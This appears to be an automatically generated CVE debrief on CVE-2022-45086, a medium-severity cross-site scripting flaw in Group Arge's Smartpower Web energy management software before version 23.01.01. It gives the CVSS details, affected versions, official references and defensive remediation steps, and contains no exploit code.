PatchSiren cyber security CVE debrief

CVE-2022-45086 Group Arge Energy and Control Systems CVE debrief

A stored or reflected Cross-Site Scripting (XSS) vulnerability exists in Group Arge Energy and Control Systems Smartpower Web prior to version 23.01.01. The flaw stems from improper neutralization of user-supplied input during web page generation (CWE-79), allowing an attacker with low privileges to inject malicious scripts that execute in the context of another user's browser session. The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates network attack vector, low attack complexity, low privileges required, user interaction required, changed scope, and low impacts to confidentiality and integrity with no availability impact. The vulnerability was published by NVD on 2023-02-12 and last modified on 2026-05-18. No known exploitation in ransomware campaigns has been documented, and the vulnerability is not listed in CISA KEV.

Vendor: Group Arge Energy and Control Systems
Product: Smartpower Web
CVSS: MEDIUM 5.4
CISA KEV: Not listed in stored evidence
Original CVE published: 2023-02-12
Original CVE updated: 2026-05-18
Advisory published: 2023-02-12
Advisory updated: 2026-05-18

Who should care

Organizations operating Smartpower Web SCADA or energy management systems, particularly in critical infrastructure and industrial control environments. Security teams responsible for OT/ICS web application security, as well as compliance officers addressing energy sector cybersecurity frameworks.

Technical summary

Smartpower Web, an energy and control systems management platform by Group Arge (Gruparge), contains an improper input neutralization flaw (CWE-79) enabling cross-site scripting attacks. The vulnerability affects all versions prior to 23.01.01. Successful exploitation requires low-privileged authenticated access and user interaction, with potential for session hijacking, credential theft, or unauthorized actions within the application context. The scope change (S:C) indicates impact beyond the vulnerable component to other security contexts.

Defensive priority

medium

Recommended defensive actions

Upgrade Smartpower Web to version 23.01.01 or later to remediate the XSS vulnerability.
Implement Content Security Policy (CSP) headers to mitigate impact of any residual XSS vectors.
Apply principle of least privilege to web application accounts to reduce attack surface.
Review and sanitize all user-supplied input in web page generation contexts per OWASP XSS Prevention Cheat Sheet guidance.
Monitor for anomalous script execution or unexpected outbound requests from Smartpower Web interfaces.

Evidence notes

CWE-79 confirmed by both USOM (secondary) and NVD (primary). Affected versions confirmed via CPE criteria: cpe:2.3:a:gruparge:smartpower_web:*:*:*:*:*:*:*:* with versionEndExcluding 23.01.01. Advisory sources from Turkish National Cyber Security Incident Response Center (USOM) and Turkish Cyber Security Directorate.

Official resources

CVE-2022-45086 CVE record
CVE.org
CVE-2022-45086 NVD detail
NVD
Source item URL
nvd_modified
Source reference
[email protected]
Mitigation or vendor reference
[email protected] - Third Party Advisory

2023-02-12